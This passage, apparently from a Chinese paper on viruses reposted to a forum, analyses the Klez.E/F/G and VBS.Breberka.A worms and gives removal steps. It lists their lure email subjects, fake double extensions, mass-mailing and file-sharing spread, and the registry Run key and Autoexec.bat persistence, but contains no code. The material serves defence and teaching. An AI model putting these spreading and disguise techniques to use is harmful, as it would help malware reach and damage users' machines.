但是,即便是在使用除此之外的邮件软件及堵塞了IE安全漏洞的情况下,如果运行了该病毒文件,也会被感染并受害。 该病毒一旦发作,就会向地址簿及个人电脑内文件(HTML文件及文本文件)记录的所有邮件地址发送附件中添加病毒自身的邮件。 另外,该病毒还可以将自身复制到可访问的共享文件夹中。 更为恶劣的是,单数月的6号和13号该病毒就对特定的文件进行破坏。
病毒邮件的发件者名称(From),将会使用Klez.E从地址簿或电脑内部文件中收集的某个邮件地址。也就是说,大部分情况下,使用的发件地址并不是发送病毒邮件的用户的真实地址。因此,邮件的接收者无法直接通知发件者感染了病毒。
另外,Klez.E恶意使用的是在2001年3月公开的旧安全漏洞。因此,可以通过其后公开的Service Pack(SP)及IE的版本进行修正。具体来说,可以通过IE 5.5 SP2及IE 6(标准结构以上)进行修正(SP的应用及版本升级可参考"面向主用户的安全对策简易手册")。
Klez.e Klez.f Klez.g(求职信)分析报告
信件主题可能为以下内容:
Hi,
Hello,
Re:
Fw:
Undeliverable mail--"..."
Return
how are you
Let's be friends
Darling
Don't drink too much
your password
Honey
Some questions
Please try again
welcome to my hometown
The Garden of Eden
Introduction on ADSL
Meeting notice
questionnaire
Congratulations
Sos!
Japanese girl VS playboy
Look,my beautiful girl friend
Eager to see you
spice girls' vocal concert
Japanese lass' sexy pictures
信件携带的附件虚假扩展名可能为以下之一:
txt htm html wab doc xls jpg cpp c pas mpg mpeg bak mp3
真实扩展名为EXE SCR PIF BAT之一。
病毒体内有以下加密信息:
Win32 Klez V2.0 & Win32 Elkern V1.1,(There nick name is Twin Virus*^__^*)
Copyright,made in Asia,announcement:
1.I will try my best to protect the user from some vicious virus,Funlove,Sircam,Nimda,CodeRed
and even include 32.Klez1.X
2.Pitiful AVers,can't Elkern 1.0 & 1.1 work on Win 2K&XP?Plz clear your eyes.
3.Well paid jobs are wanted
4.Poor life should be unblessed
5.Don't accuse me.Please accuse the unfair shit world
解决方法,本病毒无法手工杀毒,只能升级杀毒软件。并且由于会结束进程,所以建议用户在DOS下用杀毒软件清除。
9.2.5、 解决VBS.Breberka.A病毒
VBS.Breberka.A是一个加密的.vbe蠕虫,它能够将自身发送给所有MAPI地址簿中的用户。邮件内容如下:
当VBS.Breberka.A在执行时,将进行下面的工作:
1、在激活有效载荷之前,蠕虫检查下面的注册键是否存在:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Breberka 该注册键值为...by gl
2、如果该注册键不存在,那么蠕虫将分别在当前windows目录和windows\temporary目录中创建自身副本,文件名分别为Winhelp.vbe和Breberka.txt[10 个空格.vbe。
3、然后蠕虫向所有MAPI地址簿中的地址发送自身的副本,同时创建一个\Breberka注册键以防再次被激活。
4、将值SysHelp / StartUp C:\Windows\winhelp.vbe添加到注册键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run中。 这样做是为了使蠕虫在每次windows 启动后即被运行。
5、接下来,蠕虫将连接到所有固定和网络驱动器,并在这些驱动器的根目录下创建两个文件:
一个名为 dropper.com 的十六位文件;一个名为 Breberka.txt<10个空格>.vbe的蠕虫副本。
6、修改所有驱动器上的Autoexec.bat文件,使windows 每次启动后都能够被运行。
清除办法:
删除所有检测到的蠕虫副本和注册表中的蠕虫入口。
修改注册表:
1、删除HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Breberka
右侧的键值:...by gl
2、删除HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
右侧的键值:SysHelp / StartUp C:\Windows\winhelp.vbe
第十章 结论语
对病毒的防杀是信息安全的一个重要的组成部分,是保证信息安全无误传送的重要前提,本文通过对病毒(主要是针对vbs病毒)的全面深刻的的介绍,本文对一些比较常见的病毒的发作原理及防治方法作了较为详细地阐述,提供了大部分的关键源代码。在网络日益普遍现阶段,就有了更为重要的意义!由于作者能力水平有限,加之写作时间仓促,不当之处在所难免,恳请批评指正 |
发表于 2008-2-13 11:31:00
能讲解一下就好了